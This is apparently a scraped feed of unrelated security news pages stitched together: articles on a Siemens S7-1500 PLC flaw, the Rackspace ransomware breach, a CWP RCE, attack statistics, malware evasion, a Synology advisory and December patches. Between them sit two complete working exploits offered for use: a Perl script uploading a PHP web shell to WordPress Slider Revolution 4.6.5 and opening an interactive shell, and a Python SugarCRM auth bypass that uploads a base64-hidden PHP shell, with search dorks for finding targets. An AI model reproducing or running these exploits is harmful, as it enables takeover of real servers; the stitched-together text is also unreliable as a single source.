More than 120 models of Siemens' S7-1500 PLCs contain a serious vulnerability—and no fix is on the way.

In 2009, the computer worm Stuxnet crippled hundreds of centrifuges inside Iran’s Natanz uranium enrichment plant by targeting the software running on the facility’s industrial computers, known as programmable logic controllers. The exploited PLCs were made by the automation giant Siemens and were all models from the company’s ubiquitous, long-running SIMATIC S7 product series. Now, more than a decade later, Siemens disclosed today that a vulnerability in its S7-1500 series could be exploited by an attacker to silently install malicious firmware on the devices and take full control of them.

The vulnerability was discovered by researchers at the embedded device security firm Red Balloon Security after they spent more than a year developing a methodology to evaluate the S7-1500’s firmware, which Siemens has encrypted for added protection since 2013. Firmware is the low-level code that coordinates hardware and software on a computer. The vulnerability stems from a basic error in how the cryptography is implemented, but Siemens can’t fix it through a software patch because the scheme is physically burned onto a dedicated ATECC CryptoAuthentication chip. As a result, Siemens says it has no fix planned for any of the 122 S7-1500 PLC models that the company lists as being vulnerable. 

Siemens says that because the vulnerability requires physical access to exploit on its own, customers should mitigate the threat by assessing “the risk of physical access to the device in the target deployment” and implementing “measures to make sure that only trusted personnel have access to the physical hardware.” The researchers point out, though, that the vulnerability could potentially be chained with other remote access vulnerabilities on the same network as the vulnerable S7-1500 PLCs to deliver the malicious firmware without in-person contact. The Stuxnet attackers famously used tainted USB thumb drives as a creative vector to introduce their malware into “air-gapped” networks and ultimately infect then-current S7-300 and 400 series PLCs.

“Seimans PLCs are used in very important industrial capacities around the world, many of which are potentially very attractive targets of attacks, as with Stuxnet and the nuclear centrifuges,” says Grant Skipper, a Red Balloon Security research scientist.

The ubiquity and criticality of S7-1500 PLCs are the two traits that motivated the researchers to do a deep dive into the security of the devices. To a motivated and well-resourced attacker, any flaws could be worth exploiting.

“The encrypted firmware means that without a lot of effort, you don’t have any insight inside a device, so we wanted to see what was hiding in the 1500 product line,” says Red Balloon Security research scientist Yuanzhe Wu. “The devices use a dedicated cryptography coprocessor to verify the encrypted firmware that’s loaded on the device, decrypt the firmware, and let the device boot. However, we found vulnerabilities that an attacker could abuse to make the crypto coprocessor act like an oracle to decrypt firmware and then help tamper with it to make malicious modifications.”

Since firmware underlies a device’s functions, the ability to silently modify the firmware would undermine all other security protections and give an attacker total control of the device without its owner realizing that anything has changed. 

“This separate crypto core is a very rudimentary chip. It’s not like a big processor, so it doesn’t really know who it’s talking to or what’s going on in the broader context,” Red Balloon’s Skipper says. “So if you can tell it the right things that you observed the processor telling it, it will talk to you as if you are the processor. So we can get in between the processor and the crypto core and then we basically tell it, ‘Hey, we are the processor and we are going to give you some data and we want you to encrypt it.’ And the little crypto core isn’t going to question that. It just does it.”

Siemens notes that the vulnerabilities are not related to the company’s own firmware update process and do not give attackers the ability to hijack that distribution channel. But the fact that any S7-1500 can become a firmware-blessing oracle is significant and bestows a power that individual devices should not have, undermining the whole purpose of encrypting the firmware in the first place.

“S7s should not be able to re-encrypt firmware for other S7s,” says Ang Cui, Red Balloon Security’s founder and CEO. “This is a fundamental design flaw and a significant implementation error.”

While Siemens isn’t directly releasing any fixes for the vulnerability, the company says it is in the process of releasing new-generation processor hardware that fixes the vulnerability for several S7-1500 models. And the company says it is “working on new hardware versions for remaining PLC types to address this vulnerability completely.” The Red Balloon researchers say they have not yet been able to independently validate that the vulnerability has been fixed in this latest S7-1500 hardware.

Still, the Red Balloon Security researchers say that it would be possible for Siemens to release a firmware audit tool for any PLC to check whether there has been tampering on the device. Since the vulnerability will persist on impacted devices, such a feature would give S7-1500 owners more insight into their PLCs and the ability to monitor them for suspicious activity.

“It’s the same movie, just a different day,” says Red Balloon’s Cui. “Does very complicated, exotic hardware security improve overall security? Well, if you do it right, it could help, but I haven’t seen any human do it right. When you do it wrong, it always becomes a double-edged sword—and the edge of that sword is very sharp.”

Though Siemens says it is addressing the S7-1500 vulnerability in new models, the population of vulnerable 1500s in industrial control and critical infrastructure systems around the world is extensive, and these units will remain in use for decades.

“Siemens is saying that this will not be fixed, so it’s not just a zero day—this will remain a forever day until all the vulnerable 1500s go out of service,” Cui says. “It could be dangerous to leave this unaddressed.”

A Siemens S7-1500 Logic Controller Flaw Raises the Specter of Stuxnet

WordPress Slider Revolution plugin version 4.6.5 suffers from a remote shell upload vulnerability.

====================================================================================================================================  
| # Title     : WordPress - Slider Revolution 4.6.5 WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit                 |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               |   
| # Vendor    : https://www.sliderrevolution.com/                                                                                  |    
| # Dork      : index off revslider\backup                                                                                         |  
====================================================================================================================================

[+] poc :

[+] Web shell upload :

    The following perl exploit will attempt to load the HTTP php shell through the update_plugin function  
    To use the exploit, be sure to compress the backdoor file  
    Because the exploit uploads a compressed file to the target

  [+] simple backdoor  :

     <?php  
     $cmd = $_GET['cmd'];  
     system($cmd);  
     ?> 

[+] Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension (indoushka.zip)

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine 

[+] Perl exploit :

 #!/usr/bin/perl  
#  
# Title     :WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit   
# Author    :indoushka  
# Vendor    :https://www.sliderrevolution.com/

use LWP::UserAgent;  
use MIME::Base64;  
use strict;

sub banner {  
system(($^O eq 'MSWin32') ? 'cls' : 'clear');  
print "   ============[+] Author : indoushka[+]===================\n";  
print "[+] Slider Revolution 4.6.5 shell upload 0-day exploit     [+]\n";  
print "   ========================================================   \n";  
print "[+] Uploading an web shell:                                [+]\n";  
print "[+] The following perl exploit will attempt to load the    [+]\n";   
print "[+] HTTP php backdoor through the update_plugin function   [+]\n";  
print "[+] To use the exploit, make sure you compress the backdoor[+]\n";   
print "============================================================== \n";  
system('color a');  
}

if (!defined ($ARGV[0] && $ARGV[1])) {  
banner();  
print "perl $0 <target> <plugin>\n";  
print "perl $0 http://localhost revslider\n";  
exit;  
}

my $zip1 = "indoushka.zip";

unless (-e ($zip1))  
{   
banner();  
print "[-] $zip1 not found! RTFM\n";  
exit;  
}

my $host = $ARGV[0];  
my $plugin = $ARGV[1];  
my $action;  
my $update_file;

if ($plugin eq "revslider") {  
$action = "revslider_ajax_action";  
$update_file = "$zip1";  
}  
elsif ($plugin eq "showbiz") {  
$action = "showbiz_ajax_action";

}  
else {  
banner();  
print "[-] Wrong plugin name\n";  
print "perl $0 <target> <plugin>\n";  
print "perl $0 http://localhost revslider\n";  
exit;  
}  
my $target = "wp-admin/admin-ajax.php";  
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php"; 

sub randomagent {  
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',  
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',  
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',  
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',  
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',  
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'  
);  
my $random = $array[rand @array];  
return($random);  
}  
my $useragent = randomagent();

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });  
$ua->timeout(10);  
$ua->agent($useragent);  
my $status = $ua->get("$host/$target");  
unless ($status->is_success) {  
banner();  
print "[-] Xploit failed: " . $status->status_line . "\n";  
exit;  
}

banner();  
print "[*] Target set to $plugin\n";  
print "[*] MorXploiting $host\n";

my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);

print "[*] Sent payload\n";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) {  
print "[+] Payload successfully executed\n";  
}

elsif ($exploit->decoded_content =~ /Wrong request/) {  
print "[-] Payload failed: Not vulnerable\n";  
exit;  
}

elsif ($exploit->decoded_content =~ m/0$/) {  
print "[-] Payload failed: Plugin unavailable\n";  
exit;  
}

else {  
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;  
print "[-] Payload failed:$1\n";  
print "[-] " . $exploit->decoded_content unless (defined $1);  
print "\n";  
exit;  
}

print "[*] Checking if shell was uploaded\n";

sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }  
my $rndstr = rndstr(8, 1..9, 'a'..'z');  
my $cmd1 = encode_base64("echo $rndstr");  
my $status = $ua->get("$host/$shell?cmd=$cmd1");

if ($status->decoded_content =~ /system has been disabled/) {  
print "[-] Xploit failed: system() has been disabled\n";  
exit;  
}

elsif ($status->decoded_content !~ /$rndstr/) {  
print "[-] Xploit failed: " . $status->status_line . "\n";  
exit;  
}

elsif ($status->decoded_content =~ /$rndstr/) {  
print "[+] Shell successfully uploaded\n";  
}  
my $cmd2 = encode_base64("whoami");  
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");  
my $cmd3 = encode_base64("uname -n");  
my $uname = $ua->get("$host/$shell?cmd=$cmd3");  
my $cmd4 = encode_base64("id");  
my $id = $ua->get("$host/$shell?cmd=$cmd4");  
my $cmd5 = encode_base64("uname -a");  
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");  
print $unamea->decoded_content;   
print $id->decoded_content;  
my $wa = $whoami->decoded_content;  
my $un = $uname->decoded_content;  
chomp($wa);  
chomp($un);

while () {  
print "\n$wa\@$un:~\$ ";  
chomp(my $cmd=<STDIN>);  
if ($cmd eq "exit")   
{   
print "Aurevoir!\n";  
exit;  
}  
my $ucmd = encode_base64("$cmd");  
my $output = $ua->get("$host/$shell?cmd=$ucmd");  
print $output->decoded_content;  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |  
                                                                                                                                      |  
=======================================================================================================================================

WordPress Slider Revolution 4.6.5 Shell Upload

Vendor patched the vulnerability in October after a red team alert

Adam Bannister 06 January 2023 at 15:40 UTC

Vendor patched the vulnerability in October after a red team alert

A pre-authentication remote code execution (RCE) exploit has landed for popular web hosting platform Control Web Panel (CWP).

The corresponding vulnerability in CWP 7 was patched and then released in version 0.9.8.1147 on October 25. All previous versions are affected.

CWP, formerly CentOS Web Panel, is a free-to-use, Linux control panel with roughly 200,000 servers in active use.

DON’T MISS Tell us what you think of The Daily Swig to be in with a chance of winning Burp Suite swag

The Proof of Concept (PoC) was posted to GitHub and YouTube yesterday (January 5) by Numan Türle, security engineer at Turkish infosec outfit Gais Security.

Türle told The Daily Swig that he disclosed technical details and requested a CVE after receiving assurances that a sufficient number of servers had been updated to the patched version.

The flaw has now been designated as CVE-2022-44877 with a CVSS severity rating still pending.

**Double quotes problem**

The flaw resides in the component and allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.

According to Türle, it resulted from CWP using the following structure to log incorrect entries:

“Since the request URI comes from the user, and as you can see it is within double quotes, it is possible to run commands such as , which is a bash feature,” he said.

“They have made the request URI into , but double quotes are interpreted on the bash side. It is actually just a problem with double quotes. It was a small problem but could be very annoying.”

**Timeline**

Türle said the bug emerged from zero-day research undertaken on third-party applications used by customers of Gais Security.

“We discovered this vulnerability in July 2022 and closed the ports by first notifying our customers,” he said.

CWP was notified and remediation began on July 30. “Since it was a busy period, we sent the full report to the CWP team on 22.10.2022. The CWP team submitted a special version within two days and we confirmed that we were able to reproduce the vulnerability and submitted a new report.”

Türle praised CWP’s security team for a “very fast fix”.

“While vulnerabilities that I have previously communicated to other companies can take almost one to three months, the CWP team closed the vulnerability in two days,” he added.

The Daily Swig has contacted CWP for comment and will update this article accordingly if they do so.

YOU MAY ALSO LIKE Tesla tackles CORS misconfigurations that left internal networks vulnerable

Exploit drops for remote code execution bug in Control Web Panel 

Cloud services provider Rackspace on Thursday confirmed that the ransomware gang known as Play was responsible for last month's breach.
The security incident, which took place on December 2, 2022, leveraged a previously unknown security exploit to gain initial access to the Rackspace Hosted Exchange email environment.
"This zero-day exploit is associated with CVE-2022-41080," the Texas-based

Cloud Security / Cyber Threat

Cloud services provider Rackspace on Thursday confirmed that the ransomware gang known as **Play** was responsible for last month's breach.

The security incident, which took place on December 2, 2022, leveraged a previously unknown security exploit to gain initial access to the Rackspace Hosted Exchange email environment.

"This zero-day exploit is associated with CVE-2022-41080," the Texas-based company said. "Microsoft disclosed CVE-2022-41080 as a privilege escalation vulnerability and did not include notes for being part of a remote code execution chain that was exploitable."

Rackspace's forensic investigation found that the threat actor accessed the Personal Storage Table (.PST) of 27 customers out of nearly 30,000 customers on the Hosted Exchange email environment.

However, the company said there is no evidence the adversary viewed, misused, or distributed the customer's emails or data from those personal storage folders. It further said it intends to retire its Hosted Exchange platform as part of a planned migration to Microsoft 365.

It's not currently not known if Rackspace paid a ransom to the cybercriminals, but the disclosure follows a report from CrowdStrike last month that shed light on the new technique, dubbed OWASSRF, employed by the Play ransomware actors.

The mechanism targets Exchange servers that are unpatched against the ProxyNotShell vulnerabilities (CVE-2022-41040 and CVE-2022-41082) but have in place URL rewrite mitigations for the Autodiscover endpoint.

This involves an exploit chain comprising CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution in a manner that bypasses the blocking rules through Outlook Web Access (OWA). The flaws were addressed by Microsoft in November 2022.

The Windows maker, in a statement shared with The Hacker News, urged customers to prioritize installing its November 2022 Exchange Server updates and that the reported method targets vulnerable systems that have not not applied the latest fixes.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Rackspace Confirms Play Ransomware Gang Responsible for Recent Breach

Check Point Research (CPR) releases new data on 2022 cyberattack trends. The data is segmented by global volume, industry and geography. Global cyberattacks increased by 38% in 2022, compared to 2021. These cyberattack numbers were driven by smaller, more agile hacker and ransomware gangs, who focused on exploiting collaboration tools used in work-from-home environments, targeting of education institutions that shifted to e-learning post COVID-19. This increase in global cyberattacks also stems from hacker interest in healthcare organizations, which saw the largest increase in cyberattacks in 2022, when compared to all other industries. CPR warns that the maturity of AI technology, such as CHATGPT, can accelerate the number of cyberattacks in 2023. 

Check Point Research (CPR) has released new data on last year’s cyberattack trends. The data is segmented by global volume, industries, continents and countries.

**Key Statistics:** 

*   Global volume of cyberattacks reached an all-time high in Q4 with an average of 1168 weekly attacks per organization
*   Top 3 most attacked industries in 2022 were Education/Research, Government and Healthcare
*   Geography of Africa experienced the highest volume of attacks with 1875 weekly attacks per organization, followed by APAC with 1691 weekly attacks per organization
*   North America (+52%), Latin America (+29%) and Europe (+26%) showed largest increases in cyberattacks in 2022, compared to 2021
*   USA saw a 57% increase in overall cyberattacks in 2022, UK saw a 77% increase and Singapore saw a 26% increase

Cyberattacks are increasing world-wide, with 38% more cyberattacks per week on corporate networks in 2022, compared to 2021. Several cyber threat trends are all happening at once.

For one, the ransomware ecosystem is continuing to evolve and grow with smaller, more agile criminal groups that form to evade law enforcement. Second, hackers are widening their aim to target business collaboration tools such as Slack, Teams, OneDrive and Google Drive with phishing exploits. These make for a rich source of sensitive data given that most organizations’ employees continue to work remotely.

Third, academic institutions have become a popular feeding ground for cybercriminals following the rapid digitization they undertook in response to the COVID-19 pandemic. In fact, the education/research sector was the number one most attacked industry globally, seeing a 43% increase in 2022 compared to 2021, with an average of 2,314 attacks per organisation every week. Many education institutions have been ill-prepared for the unexpected shift to online learning, creating ample opportunity for hackers to infiltrate networks through any means necessary. Schools and universities also have the unique challenge of dealing with children or young adults, many of which use their own devices, work from shared locations, and often connect to public WiFi without thinking of the security implications.

Looking back at cyberattacks for the healthcare sector in 2022, healthcare organizations in the US suffered an average of 1410 weekly cyberattacks per organization, which is 86% higher than the number we saw in 2021, with the healthcare sector ranking second out of all sectors for the most cyberattacks in the US.

Hackers like to target hospitals because they perceive them as short on cyber security resources with smaller hospitals particularly vulnerable, as they are underfunded and understaffed to handle a sophisticated cyberattack.

The healthcare sector is so lucrative to hackers as they aim to retrieve health insurance information, medical records numbers and, sometimes, even social security numbers with direct threats from ransomware gangs to patients, demanding payment under threats of having patient records released. Ransomware gangs also find the attention gained from attacking a hospital as an attractive plus-point for their notoriety.

Unfortunately, we expect the increase in cyberattack activity to only increase. With AI technologies such as ChatGPT readily available to the public, it is possible for hackers to generate malicious code and emails at a faster, more automated pace.

To protect yourself, it is imperative to think about prevention first, not detection. There are several best practices and actions an organization can take to minimize their exposure to the next attack or breach, such as cyber security training, keeping patches up-to-date and implementing anti-ransomware technology.”

**Cyber Safety Tips:** 

1.  **Cyber Awareness Training**: Frequent cybersecurity awareness training is crucial to protecting the organization against ransomware. This training should instruct employees to do the following:
    1.  Not click on malicious links
    2.  Never open unexpected or untrusted attachments
    3.  Avoid revealing personal or sensitive data to phishers
    4.  Verify software legitimacy before downloading it
    5.  Never plug an unknown USB into their computer
    6.  Use a VPN when connecting via untrusted or public Wi-Fi
2.  **Up-to-Date Patches:** Keeping computers and servers up-to-date and applying security patches, especially those labeled as critical, can help to limit an organization’s vulnerability to ransomware attacks.
3.  **Keep your software updated.** Ransomware attackers sometimes find an entry point within your apps and software, noting vulnerabilities and capitalizing on them. Fortunately, some developers are actively searching for new vulnerabilities and patching them out. If you want to make use of these patches, you need to have a patch management strategy in place—and you need to make sure all your team members are constantly up to date with the latest versions.
4.  **Choose Prevention over detection:** Many claim that attacks will happen, and there is no way to avoid them, and therefore the only thing left to do is to invest in technologies that detect the attack once it has already breached the network and mitigate the damage as soon as possible. This is not true. Not only can attacks be blocked, but they can be prevented, including zero-day attacks and unknown malware. With the right technologies in place, most attacks, even the most advanced ones, can be prevented without disrupting the normal business flow.

Check Point Research Reports a 38% Increase In 2022 Global Cyberattacks

Security teams may be missing targeted attacks and advanced exploits if attackers are using evasive techniques to avoid detection. Defenders need to up their game.

Attackers today combine state-of-the-art obfuscation and adaptive environment-specific features to avoid detection by traditional malware analysis systems. If your security team is relying on legacy approaches, like traditional sandboxing, to scan files entering your network, they may miss these dangerous exploits targeting your organization. If your security teams are spending their time with easy-to-detect, common vulnerabilities and not on the targeted attacks, they are exposing your organization to unnecessary risk from cybercriminals.

Nothing about this pattern is new: Researchers develop new anti-malware technology to detect malware attacks. Cybercriminals adapt their malware variants to avoid detection. And the cycle continues.

Attackers are adopting techniques, such as machine fingerprinting and geofencing, where they use information about the victim's application stack and system environments to compromise systems.

**Gotta Catch 'Em All: Geofencing**

There are many ways for malware to get on a victim's machine. Once there, some malware variants remain dormant if the victim's machine or network is not in a specific country. That comes courtesy of geofencing.

The malware looks up the external IP address geographic region via an external database or service and checks whether the device is located in the target region. If the device's geographic location is in a region of interest, the malware detonates. It may install a second-stage malware; steal useful information, such as administrator credentials; exfiltrate data to a system controlled by criminals; and remove all traces of its activity on the machine.

Attackers add geofencing features to malware for many reasons. It may be easier to evade detection by locations with strong security postures. Sometimes they don't want to infect networks in their home countries, where they could face prosecution. Savvy criminals target wealthy countries inhabited by trusting folks who are more likely to open documents and pay ransom. Or they may know that business leaders in a specific region rely on weak defensive postures or are less likely to use two-factor authentication.

One example of a region–specific attack: The South Korean government widely uses the Hangul Word Processor (HWP). North Korean attackers write malware in Hangul to penetrate critical government systems. Trying to use this malware to compromise US government employees, however, would be a waste of resources.

**Finding the Golden Image: Fingerprinting**

Malware authors rely on diverse fingerprinting techniques to determine whether machines are susceptible to their attack chains. Fingerprinting helps malware avoid detection by appearing harmless to antivirus technologies.

The malware remains dormant on the victim's machine unless the environment meets predefined conditions — such as having a specific application installed or certain configuration settings enabled. Attackers also use fingerprinting techniques to figure out whether the compromised system is actually a virtual machine using a preconfigured, out-of-the-box or initial install image. If that is the case, the malware does not detonate.

**What Adaptive and Dynamic Analysis Looks Like**

Traditional sandboxes may not detect advanced malware or targeted zero-day attacks if the attacker is using techniques such as geofencing or fingerprinting. For example, malware that uses geofencing must look up IP addresses to determine its geographic location. In contrast, adaptive dynamic analysis technology can help detect very specific, targeted attacks because it can detect and automatically bypass environment and anti-analysis checks. 

Adaptive analysis performs execution only of instructions related to the malware, as opposed to traditional sandboxes, which are fully virtualized operating systems executing instructions of every service and application on the system. As a result, the total resource utilization for adaptive analysis is significantly lower. Being able to extract intelligence in the form of indicators of compromise (IOCs) enables threat hunting, proactive self-defense improvements, and threat actor attribution.

Threat Actors Evade Detection Through Geofencing & Fingerprinting

Integer overflow or wraparound vulnerability in CGI component in Synology Router Manager (SRM) before 1.2.5-8227-6 and 1.3.1-9346-3 allows remote attackers to overflow buffers via unspecified vectors.

**Abstract**

Multiple vulnerabilities allow remote attackers to execute arbitrary command, conduct denial-of-service attacks or read arbitrary files via a susceptible version of Synology Router Manager (SRM).

**Affected Products**

Product

Severity

Fixed Release Availability

SRM 1.3

Critical

Upgrade to 1.3.1-9346-3 or above.

SRM 1.2

Critical

Upgrade to 1.2.5-8227-6 or above.

**Mitigation**

None

**Detail**

Reserved

**Acknowledgement**

*   Orange Tsai from Devcore
    
*   Gaurav Baruah working with Trend Micro’s Zero Day Initiative
    
*   Computest working with Trend Micro’s Zero Day Initiative
    
*   Lukas Kupczyk from CrowdStrike
    

**Revision**

Revision

Date

Description

1

2022-12-22

Initial public release.

CVE-2023-0077: Synology_SA_22_25 | Synology Inc.

The hosting provider had not applied Microsoft's new patch due to publicly reported issues with the update.

Managed cloud hosting services company Rackspace Technology has confirmed that the massive Dec. 2 ransomware attack that disrupted email services for thousands of its small-to-midsized business customers came via a zero-day exploit against a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server, aka CVE-2022-41080.

"We are now highly confident that the root cause in this case pertains to a zero-day exploit associated with CVE-2022-41080," Karen O'Reilly-Smith, chief security officer for Rackspace, told Dark Reading in an email response. "Microsoft disclosed CVE-2022-41080 as a privilege escalation vulnerability and did not include notes for being part of a remote code execution chain that was exploitable."

CVE-2022-41080 is a bug that Microsoft patched in November. 

An external advisor to Rackspace told Dark Reading that Rackspace had held off on applying the ProxyNotShell patch amid concerns over reports that it caused "authentication errors" that the company feared could take down its Exchange Servers. Rackspace had previously implemented Microsoft's recommended mitigations for the vulnerabilities, which Microsoft had deemed a way to thwart the attacks.

Rackspace hired CrowdStrike to help with its breach investigation, and the security firm shared its findings in a blog post detailing how the Play ransomware group was employing a new technique to trigger the next-stage ProxyNotShell RCE flaw known as CVE-2022-41082 using CVE-2022-41080. CrowdStrike's post did not name Rackspace at the time, but the company's external advisor tells Dark Reading that the research about Play's mitigation bypass method was the result of CrowdStrike's investigation into the attack on the hosting services provider.

Microsoft told Dark Reading last month that while the attack bypasses previously issued ProxyNotShell mitigations, it does not bypass the actual patch itself.   

Patching is the answer if you can do it," the external advisor says, noting that the company had seriously weighed the risk of applying the patch at a time when the mitigations were said to be effective and the patch came with risk of taking down its servers. "They evaluated, considered and weighed \[the risk\] they knew about" at that time, the external advisor says. The company still hasn't applied the patch since the servers remain down. 

A Rackspace spokesperson would not comment on whether Rackspace had paid the ransomware attackers.  

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Rackspace: Ransomware Attack Bypassed ProxyNotShell Mitigations

SugarCRM versions up to 12.2.0 suffer from a remote shell upload vulnerability.

    #!/usr/bin/env python## SugarCRM 0-day Auth Bypass + RCE Exploit## Dorks:# https://www.google.com/search?q=site:sugarondemand.com&filter=0# https://www.google.com/search?q=intitle:"SugarCRM"+inurl:index.php# https://www.shodan.io/search?query=http.title:"SugarCRM"# https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:"SugarCRM"# https://search.censys.io/search?resource=hosts&q=services.http.response.headers.content_security_policy:"*.sugarcrm.com"import base64, re, requests, sys, uuidrequests.packages.urllib3.disable_warnings()if len(sys.argv) != 2:  sys.exit("Usage: %s [URL]" % sys.argv[0])  print "[+] Sending authentication request"url     = sys.argv[1] + "/index.php"session = {"PHPSESSID": str(uuid.uuid4())}params  = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1}requests.post(url, cookies=session, data=params, verify=False)print "[+] Uploading PHP shell\n"png_sh = "iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC"upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")} # you can also try with other extensions like .php7 .php5 or .phtmlparams = {"module": "EmailTemplates", "action": "AttachFiles"}requests.post(url, cookies=session, data=params, files=upload, verify=False)url = sys.argv[1] + "/cache/images/sweet.phar"while True:  cmd = raw_input("# ")  res = requests.post(url, data={"c": base64.b64encode(cmd)}, verify=False)  res = re.search("#####(.*)#####", res.text, re.DOTALL)  if res:    print res.group(1)  else:    sys.exit("\n[+] Failure!\n")

SugarCRM Shell Upload

Plus: Patches for Apple iOS 16, Google Chrome, Windows 10, and more.

The holiday season is almost over, but security patches are still continuing to arrive thick and fast in December. The month has seen updates released by Apple, Google, and Microsoft, as well as enterprise software companies including the likes of SAP, Citrix, and VMWare. 

Many of the patches fix zero-day vulnerabilities already being exploited in attacks, making it important that they are applied as soon as possible. Here’s the lowdown on all the patches released in December.

Apple iOS and iPadOS 16.2, iOS 15.7.2, iOS 16.1.2

Apple released a major point upgrade to its iOS 16 operating system in December: iOS 16.2. The update comes with features including end-to-end encryption in iCloud, but it also fixes 35 security vulnerabilities.

None of the issues patched in iOS 16.2 are known to have been used in attacks; however, many are pretty serious. The flaws include six in the Kernel and nine in the engine that powers Apple’s Safari browser, WebKit, which could allow an attacker to execute code. 

Apple also released iOS 15.7.2 for users of older iPhones that can’t run iOS 16, fixing a flaw already being used in attacks. Tracked as CVE-2022-42856, the WebKit vulnerability could allow an attacker to execute code, according to Apple’s support page. At the end of November, Apple fixed the same WebKit flaw in iOS 16.1.2.

Since the launch of iOS 16 in September, Apple has been offering security updates to those who don’t want to upgrade to the new operating system. But iOS 15.7.2 is only for older iPhones, so if you’ve got an iPhone 8 or above, you now need to upgrade to iOS 16 to stay secure. 

The iPhone maker also released macOS Ventura 13.1, watchOS 9.2, tvOS 16.2, macOS Big Sur 11.7.2, macOS Monterey 12.6.2, and Safari 16.2.

Google Android 

December was a hefty patch month for Google’s Android operating system, with fixes for dozens of security vulnerabilities issued during the month. Tracked as CVE-2022-20411, the most severe is a critical vulnerability in the System component that could lead to remote code execution over Bluetooth with no additional execution privileges needed, Google said in a security bulletin. 

Google also fixed two critical flaws in the Android Framework component, CVE-2022-20472 and CVE-2022-20473. Meanwhile, 151 Pixel-specific bugs were patched by Google in December. 

The December patch is available for Google’s own Pixel devices as well as Samsung smartphones, including the hardware maker’s flagship Galaxy range. 

Google Chrome 108

Google has issued an emergency update for its Chrome browser to fix the ninth zero-day vulnerability of the year. Tracked as CVE-2022-4262, the high-severity type confusion issue in Chrome’s V8 JavaScript engine could allow a remote attacker to exploit heap corruption via a crafted HTML page. “Google is aware that an exploit for CVE-2022-4262 exists in the wild,” the browser maker said in a blog.

The emergency update arrived just days after Google released Chrome 108, patching 28 security flaws. Among the fixes are CVE-2022-4174—a type confusion flaw in V8—and several use-after-free bugs. None of these vulnerabilities have been exploited in attacks, according to Google. But given that the latest bug is already in the hands of attackers, it’s a good idea to update Chrome as soon as possible.

Microsoft Patch Tuesday 

Microsoft’s December Patch Tuesday was another big one, fixing 49 security vulnerabilities, including a flaw being used in attacks. Tracked as CVE-2022-44698, the issue is a Windows SmartScreen security feature bypass vulnerability that could lead to loss of integrity and availability.

“An attacker can craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MOTW tagging,” Microsoft said.

Tag

#zero_day